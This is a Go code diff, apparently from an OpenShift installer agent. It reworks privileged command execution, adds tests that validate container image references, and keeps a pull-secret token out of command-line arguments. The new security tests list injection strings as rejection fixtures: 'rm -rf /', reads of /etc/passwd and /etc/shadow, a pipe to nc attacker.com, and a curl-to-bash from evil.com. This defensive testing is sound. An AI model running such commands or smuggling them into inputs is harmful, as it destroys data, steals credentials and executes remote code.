-		// The mount namespace is required for podman to access the host's container
-		// storage
-		"--mount",
-		// TODO: Document why we need the IPC namespace
-		"--ipc",
-		"--pid",
-		"--",
-		command,
-	}
-
-	arguments = append(arguments, args...)
-	return o.executor.ExecCommand(liveLogger, commandBase, arguments...)
+	return o.executor.ExecCommandWithOptions(liveLogger, command, args, execute.WithPrivilege())
 }
 
 func (o *ops) ReadFile(filePath string) ([]byte, error) {

--- a/src/ops/ops_test.go
+++ b/src/ops/ops_test.go
@@ -105,7 +105,7 @@ var _ = Describe("Upload logs", func() {
 		conf = &config.Config{CACertPath: "test.ca"}
 		m := MatcherContainsStringElements{[]string{"test.ca:test.ca", "-cacert=test.ca"}, true}
 		o := NewOpsWithConfig(conf, l, execMock)
-		execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m).Times(1)
+		execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "podman", m, gomock.Any(), gomock.Any()).Times(1)
 		_, err := o.UploadInstallationLogs(true)
 		Expect(err).ToNot(HaveOccurred())
 	})
@@ -113,7 +113,7 @@ var _ = Describe("Upload logs", func() {
 	It("Upload logs without ca path", func() {
 		m := MatcherContainsStringElements{[]string{"test.ca:test.ca", "-cacert=test.ca"}, false}
 		o := NewOpsWithConfig(conf, l, execMock)
-		execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m).Times(1)
+		execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "podman", m, gomock.Any(), gomock.Any()).Times(1)
 		_, err := o.UploadInstallationLogs(true)
 		Expect(err).ToNot(HaveOccurred())
 	})
@@ -137,9 +137,9 @@ var _ = Describe("Set Boot Order", func() {
 		efiDirname := d
 		It(fmt.Sprintf("Set boot order for %s", efiDirname), func() {
 			m1 := MatcherContainsStringElements{[]string{"/usr/sbin/bootlist"}, true}
-			execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m1).Times(1).Return("", errors.New("Bootlist is not exist."))
-			m2 := MatcherContainsStringElements{[]string{"test", "-d", "/sys/firmware/efi"}, true}
-			execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m2).Times(1)
+			execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "test", m1, gomock.Any()).Times(1).Return("", errors.New("Bootlist is not exist."))
+			m2 := MatcherContainsStringElements{[]string{"-d", "/sys/firmware/efi"}, true}
+			execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "test", m2, gomock.Any()).Times(1)
 			// Mock the lsblk call for getPartitionPathFromLsblk in findEfiDirectory
 			lsblkOutput := `{
 				"blockdevices": [
@@ -156,18 +156,18 @@ var _ = Describe("Set Boot Order", func() {
 					}
 				]
 			}`
-			mLsblk := MatcherContainsStringElements{[]string{"lsblk", "--bytes", "--json", "/dev/sda"}, true}
-			execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), mLsblk).Times(1).Return(lsblkOutput, nil)
-			m3 := MatcherContainsStringElements{[]string{"efibootmgr", "/dev/sda", "Red Hat Enterprise Linux"}, true}
-			execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m3).Times(1).Return("", nil)
-			m4 := MatcherContainsStringElements{[]string{"efibootmgr", "-l"}, true}
-			execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m4).Times(1)
-			m5 := MatcherContainsStringElements{[]string{"mount", "/dev/sda2", "/mnt"}, true}
-			execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m5).Times(1).Return("", nil)
-			m6 := MatcherContainsStringElements{[]string{"ls", "-1", "/mnt/EFI"}, true}
-			execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m6).Times(1).Return(fmt.Sprintf("BOOT\n%s\n", efiDirname), nil)
-			m7 := MatcherContainsStringElements{[]string{"umount", "/mnt"}, true}
-			execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m7).Times(1).Return("", nil)
+			mLsblk := MatcherContainsStringElements{[]string{"--bytes", "--json", "/dev/sda"}, true}
+			execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "lsblk", mLsblk, gomock.Any()).Times(1).Return(lsblkOutput, nil)
+			m3 := MatcherContainsStringElements{[]string{"/dev/sda", "Red Hat Enterprise Linux"}, true}
+			execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "efibootmgr", m3, gomock.Any()).Times(1).Return("", nil)
+			m4 := MatcherContainsStringElements{[]string{"-l"}, true}
+			execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "efibootmgr", m4, gomock.Any()).Times(1)
+			m5 := MatcherContainsStringElements{[]string{"/dev/sda2", "/mnt"}, true}
+			execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "mount", m5, gomock.Any()).Times(1).Return("", nil)
+			m6 := MatcherContainsStringElements{[]string{"-1", "/mnt/EFI"}, true}
+			execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "ls", m6, gomock.Any()).Times(1).Return(fmt.Sprintf("BOOT\n%s\n", efiDirname), nil)
+			m7 := MatcherContainsStringElements{[]string{"/mnt"}, true}
+			execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "umount", m7, gomock.Any()).Times(1).Return("", nil)
 			o := NewOpsWithConfig(conf, l, execMock)
 			err := o.SetBootOrder("/dev/sda")
 			Expect(err).ToNot(HaveOccurred())
@@ -176,9 +176,9 @@ var _ = Describe("Set Boot Order", func() {
 
 	It("Set boot order for ppc64le", func() {
 		m1 := MatcherContainsStringElements{[]string{"/usr/sbin/bootlist"}, true}
-		execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m1).Times(1)
-		m2 := MatcherContainsStringElements{[]string{"bootlist", "/dev/sda"}, true}
-		execMock.EXPECT().ExecCommand(gomock.Any(), gomock.Any(), m2).Times(1)
+		execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "test", m1, gomock.Any()).Times(1)
+		m2 := MatcherContainsStringElements{[]string{"/dev/sda"}, true}
+		execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "bootlist", m2, gomock.Any()).Times(1)
 		o := NewOpsWithConfig(conf, l, execMock)
 		err := o.SetBootOrder("/dev/sda")
 		Expect(err).ToNot(HaveOccurred())
@@ -460,16 +460,8 @@ var _ = Describe("overwrite OS image", func() {
 		o = NewOpsWithConfig(conf, l, execMock)
 	})
 
-	mockPrivileged := func(args ...interface{}) {
-		execMock.EXPECT().ExecCommand(nil, "nsenter",
-			append(append([]interface{}{},
-				"--target",
-				"1",
-				"--cgroup",
-				"--mount",
-				"--ipc",
-				"--pid",
-				"--"), args...)...).Times(1)
+	mockPrivileged := func(command string, args ...string) {
+		execMock.EXPECT().ExecCommandWithOptions(nil, command, args, gomock.Any()).Times(1)
 	}
 	// Helper function to generate correct partition names for all device types
 	getPartitionName := func(deviceName, partNum string) string {
@@ -504,33 +496,13 @@ var _ = Describe("overwrite OS image", func() {
 	}
 	runTest := func(device, part3, part4 string) {
 		// Mock lsblk calls for partition path discovery (called twice - once for partition 4, once for partition 3)
-		execMock.EXPECT().ExecCommand(nil, "nsenter",
-			append([]interface{}{},
-				"--target",
-				"1",
-				"--cgroup",
-				"--mount",
-				"--ipc",
-				"--pid",
-				"--",
-				"lsblk",
-				"--bytes",
-				"--json",
-				device)...).Return(formatResult(device), nil).Times(2)
+		execMock.EXPECT().ExecCommandWithOptions(nil, "lsblk",
+			[]string{"--bytes", "--json", device},
+			gomock.Any()).Return(formatResult(device), nil).Times(2)
 		// Mock lsblk call for calculateFreePercent function
-		execMock.EXPECT().ExecCommand(nil, "nsenter",
-			append([]interface{}{},
-				"--target",
-				"1",
-				"--cgroup",
-				"--mount",
-				"--ipc",
-				"--pid",
-				"--",
-				"lsblk",
-				"--bytes",
-				"--json",
-				device)...).Return(formatResult(device), nil)
+		execMock.EXPECT().ExecCommandWithOptions(nil, "lsblk",
+			[]string{"--bytes", "--json", device},
+			gomock.Any()).Return(formatResult(device), nil)
 		osImage := "quay.io/release-image:latest"
 		extraArgs := []string{
 			"--karg",
@@ -602,16 +574,19 @@ var _ = Describe("get number of reboots", func() {
 		o = NewOpsWithConfig(conf, l, execMock)
 	})
 	expect := func(ret string, err error) {
-		execMock.EXPECT().ExecCommandWithContext(gomock.Any(), gomock.Any(), "oc",
-			"--kubeconfig",
-			kubeconfigPath,
-			"debug",
-			fmt.Sprintf("node/%s", nodeName),
-			"--",
-			"chroot",
-			"/host",
-			"last",
-			"reboot").Return(ret, err)
+		execMock.EXPECT().ExecCommandWithOptions(gomock.Any(), "oc",
+			[]string{
+				"--kubeconfig",
+				kubeconfigPath,
+				"debug",
+				fmt.Sprintf("node/%s", nodeName),
+				"--",
+				"chroot",
+				"/host",
+				"last",
+				"reboot",
+			},
+			gomock.Any()).Return(ret, err)
 	}
 	It("1 reboot", func() {
 		expect("reboot   system boot  4.18.0-372.9.1.e Tue Mar  7 04:13   still running\n", nil)
@@ -644,11 +619,9 @@ var _ = Describe("WriteImageToExistingRoot", func() {
 		o        *ops
 	)
 
-	expectExec := func(out string, err error, additionalArgs ...any) {
-		baseArgs := []any{"--target", "1", "--cgroup", "--mount", "--ipc", "--pid", "--"}
-		args := append(baseArgs, additionalArgs...)
-		execMock.EXPECT().ExecCommand(gomock.Any(),
-			"nsenter", args...).Return(out, err)
+	expectExec := func(out string, err error, command string, args ...string) {
+		execMock.EXPECT().ExecCommandWithOptions(gomock.Any(),
+			command, args, gomock.Any()).Return(out, err)
 	}
 
 	BeforeEach(func() {
@@ -798,9 +771,8 @@ var _ = Describe("getPartitionPathFromLsblk", func() {
 	})
 
 	mockLsblkCommand := func(device, output string, err error) {
-		execMock.EXPECT().ExecCommand(nil, "nsenter",
-			"--target", "1", "--cgroup", "--mount", "--ipc", "--pid", "--",
-			"lsblk", "--bytes", "--json", device).Return(output, err)
+		execMock.EXPECT().ExecCommandWithOptions(nil, "lsblk",
+			[]string{"--bytes", "--json", device}, gomock.Any()).Return(output, err)
 	}
 
 	Context("Standard SATA devices", func() {
@@ -1194,16 +1166,8 @@ var _ = Describe("Copy registry data", func() {
 		o = NewOpsWithConfig(conf, l, execMock)
 	})
 
-	mockPrivileged := func(args ...interface{}) {
-		execMock.EXPECT().ExecCommand(nil, "nsenter",
-			append(append([]interface{}{},
-				"--target",
-				"1",
-				"--cgroup",
-				"--mount",
-				"--ipc",
-				"--pid",
-				"--"), args...)...).Times(1)
+	mockPrivileged := func(command string, args ...string) {
+		execMock.EXPECT().ExecCommandWithOptions(nil, command, args, gomock.Any()).Times(1)
 	}
 	// Helper function to generate correct partition names for all device types
 	getPartitionName := func(deviceName, partNum string) string {
@@ -1242,32 +1206,13 @@ var _ = Describe("Copy registry data", func() {
 		registryDataDirOnRoot := filepath.Join("/mnt/root/ostree/deploy/rhcos", registryDataDirOnDevice)
 
 		// Mock du calls for getting registry data size
-		execMock.EXPECT().ExecCommand(nil, "nsenter",
-			append([]interface{}{},
-				"--target",
-				"1",
-				"--cgroup",
-				"--mount",
-				"--ipc",
-				"--pid",
-				"--",
-				"du",
-				"-sb",
-				dataDir)...).Return(strconv.FormatInt(int64(registryDataSize), 10), nil).Times(1)
+		execMock.EXPECT().ExecCommandWithOptions(nil, "du",
+			[]string{"-sb", dataDir},
+			gomock.Any()).Return(strconv.FormatInt(int64(registryDataSize), 10), nil).Times(1)
 		// Mock lsblk calls for partition path discovery / calculateFreePercent function
-		execMock.EXPECT().ExecCommand(nil, "nsenter",
-			append([]interface{}{},
-				"--target",
-				"1",
-				"--cgroup",
-				"--mount",
-				"--ipc",
-				"--pid",
-				"--",
-				"lsblk",
-				"--bytes",
-				"--json",
-				device)...).Return(formatResult(device), nil).Times(2)
+		execMock.EXPECT().ExecCommandWithOptions(nil, "lsblk",
+			[]string{"--bytes", "--json", device},
+			gomock.Any()).Return(formatResult(device), nil).Times(2)
 
 		mockPrivileged("mkdir", "-p", "/mnt/root")
 		mockPrivileged("mount", part4, "/mnt/root")
@@ -1284,18 +1229,9 @@ var _ = Describe("Copy registry data", func() {
 		mockPrivileged("mkdir", "-p", registryDataDirOnRoot)
 
 		// Mock rsync call
-		execMock.EXPECT().ExecCommand(io.Discard, "nsenter",
-			append([]interface{}{},
-				"--target",
-				"1",
-				"--cgroup",
-				"--mount",
-				"--ipc",
-				"--pid",
-				"--",
-				"sh",
-				"-c",
-				fmt.Sprintf("rsync -ah --info=progress2 %s/ %s/", dataDir, registryDataDirOnRoot))...).Return("", nil).Times(1)
+		execMock.EXPECT().ExecCommandWithOptions(io.Discard, "sh",
+			[]string{"-c", fmt.Sprintf("rsync -ah --info=progress2 %s/ %s/", dataDir, registryDataDirOnRoot)},
+			gomock.Any()).Return("", nil).Times(1)
 
 		mockPrivileged("fsfreeze", "--freeze", "/mnt/root")
 		mockPrivileged("umount", "/mnt/root")
@@ -1314,5 +1250,202 @@ var _ = Describe("Copy registry data", func() {
 	})
 	It("Copy registry data - device mapper", func() {
 		runTest("/dev/dm-0", "/dev/dm-4")
+	})
+})
+
+var _ = Describe("Security: validateImageReference", func() {
+	It("should accept valid image references", func() {
+		validImages := []string{
+			"quay.io/openshift/must-gather:latest",
+			"registry.redhat.io/ocs4/ocs-must-gather-rhel8:v4.8",
+			"localhost:5000/my-image:tag",
+			"registry.redhat.io:443/ocs4/image:v4.8",
+			"my-registry.com:8080/repo/image:latest",
+			"my-registry.com/repo/image@sha256:abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890",
+			"registry.access.redhat.com/ubi9/ubi:latest@sha256:abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890",
+			"simple-image",
+			"namespace/image",
+		}
+
+		for _, img := range validImages {
+			err := validateImageReference(img)
+			Expect(err).ToNot(HaveOccurred(), fmt.Sprintf("Valid image '%s' should be accepted", img))
+		}
+	})
+
+	It("should reject image references with shell metacharacters", func() {
+		injectionAttempts := []string{
+			"image; rm -rf /",
+			"image | cat /etc/passwd",
+			"image && malicious",
+			"image || echo pwned",
+			"$(malicious-command)",
+			"`whoami`",
+			"image<script>",
+			"image>output",
+			"image'DROP TABLE",
+			"image\"injection",
+			"image\\escape",
+			"image!bang",
+			"image{brace}",
+			"image[array]",
+			"image(paren)",
+			"image&background",
+			"image$variable",
+		}
+
+		for _, img := range injectionAttempts {
+			err := validateImageReference(img)
+			Expect(err).To(HaveOccurred(), fmt.Sprintf("Malicious image '%s' should be rejected", img))
+			Expect(err.Error()).To(ContainSubstring("invalid"))
+		}
+	})
+
+	It("should reject image references with control characters", func() {
+		invalidImages := []string{
+			"image\nwith\nnewline",
+			"image\rwith\rcarriage",
+			"image\twith\ttab",
+			"image\x00null",
+		}
+
+		for _, img := range invalidImages {
+			err := validateImageReference(img)
+			Expect(err).To(HaveOccurred(), fmt.Sprintf("Image with control chars '%v' should be rejected", []byte(img)))
+		}
+	})
+
+	It("should reject empty image reference", func() {
+		err := validateImageReference("")
+		Expect(err).To(HaveOccurred())
+		Expect(err.Error()).To(ContainSubstring("cannot be empty"))
+	})
+})
+
+var _ = Describe("Security: GetMustGatherLogs command injection protection", func() {
+	var (
+		ctrl     *gomock.Controller
+		mockExec *execute.MockExecute
+		o        Ops
+		tempDir  string
+	)
+
+	BeforeEach(func() {
+		ctrl = gomock.NewController(GinkgoT())
+		mockExec = execute.NewMockExecute(ctrl)
+		o = NewOps(logrus.New(), mockExec)
+
+		var err error
+		tempDir, err = os.MkdirTemp("", "must-gather-test")
+		Expect(err).ToNot(HaveOccurred())
+	})
+
+	AfterEach(func() {
+		ctrl.Finish()
+		os.RemoveAll(tempDir)
+	})
+
+	It("should reject malicious image names with command injection attempts", func() {
+		maliciousImages := []string{
+			"image; rm -rf /",
+			"image && cat /etc/shadow",
+			"image | nc attacker.com 1234",
+			"$(curl http://evil.com/script.sh | bash)",
+		}
+
+		for _, img := range maliciousImages {
+			_, err := o.GetMustGatherLogs(tempDir, "/tmp/kubeconfig", img)
+			Expect(err).To(HaveOccurred(), fmt.Sprintf("Should reject malicious image: %s", img))
+			Expect(err.Error()).To(ContainSubstring("invalid"))
+		}
+	})
+
+	It("should execute oc with proper arguments for valid images", func() {
+		kubeconfig := "/tmp/kubeconfig"
+		image := "quay.io/openshift/must-gather:latest"
+
+		mustGatherDir := filepath.Join(tempDir, "must-gather.local.123456")
+		Expect(os.Mkdir(mustGatherDir, 0755)).To(Succeed())
+
+		mockExec.EXPECT().ExecCommandWithOptions(
+			gomock.Any(),
+			"oc",
+			[]string{"--kubeconfig=" + kubeconfig, "adm", "must-gather", "--image=" + image},
+			gomock.Any(),
+		).Return("output", nil)
+
+		mockExec.EXPECT().ExecCommand(
+			gomock.Any(),
+			"tar",
+			"-czf",
+			filepath.Join(tempDir, MustGatherFileName),
+			"-C",
+			tempDir,
+			"must-gather.local.123456",
+		).Return("", nil)
+
+		_, err := o.GetMustGatherLogs(tempDir, kubeconfig, image)
+		Expect(err).ToNot(HaveOccurred())
+	})
+})
+
+var _ = Describe("Security: UploadInstallationLogs credential protection", func() {
+	var (
+		ctrl       *gomock.Controller
+		mockExec   *execute.MockExecute
+		o          *ops
+		testConfig *config.Config
+	)
+
+	BeforeEach(func() {
+		ctrl = gomock.NewController(GinkgoT())
+		mockExec = execute.NewMockExecute(ctrl)
+
+		testConfig = &config.Config{
+			ClusterID:            "test-cluster",
+			URL:                  "http://test.com",
+			PullSecretToken:      "super-secret-bearer-token-12345",
+			HostID:               "test-host",
+			InfraEnvID:           "test-infraenv",
+			AgentImage:           "quay.io/test/agent:latest",
+			SkipCertVerification: false,
+		}
+
+		o = NewOpsWithConfig(testConfig, logrus.New(), mockExec).(*ops)
+	})
+
+	AfterEach(func() {
+		ctrl.Finish()
+	})
+
+	It("should pass pull-secret-token via per-command environment, not CLI argument", func() {
+		mockExec.EXPECT().ExecCommandWithOptions(
+			gomock.Any(),
+			"podman",
+			gomock.Any(),
+			gomock.Any(),
+			gomock.Any(),
+		).DoAndReturn(func(writer io.Writer, command string, args []string, opts ...execute.CommandOption) (string, error) {
+			argsString := strings.Join(args, " ")
+			Expect(command).To(Equal("podman"))
+			Expect(argsString).ToNot(ContainSubstring(testConfig.PullSecretToken),
+				"Token value should not appear in command arguments")
+
+			Expect(argsString).To(ContainSubstring("--env PULL_SECRET_TOKEN"),
+				"Should use --env flag with variable name only")
+
+			Expect(argsString).ToNot(MatchRegexp(`(?:--env|-e)\s+PULL_SECRET_TOKEN=`),
+				"Should not use --env PULL_SECRET_TOKEN=value format")
+
+			Expect(argsString).ToNot(ContainSubstring("-pull-secret-token"),
+				"Should not use -pull-secret-token CLI argument")
+
+			Expect(opts).To(HaveLen(2), "Should have WithPrivilege and WithEnv options")
+
+			return "", nil
+		})
+
+		_, err := o.UploadInstallationLogs(false)
+		Expect(err).ToNot(HaveOccurred())
 	})
 })


### PR DESCRIPTION
Harden must-gather and log upload commands and credential handling

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

- **Security**
  - Improved protection against command injection when collecting diagnostic logs, creating archives, checking host details, and applying manifests.
  - Validates diagnostic image references before execution.
  - Keeps pull-secret credentials out of command-line arguments and redacts sensitive environment values from errors and logs.
- **Reliability**
  - Uses explicit working directories for diagnostic collection to improve consistency.
  - Applies manifests and runs system commands with safer argument handling.
  - Supports secure environment and working-directory configuration for command execution.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->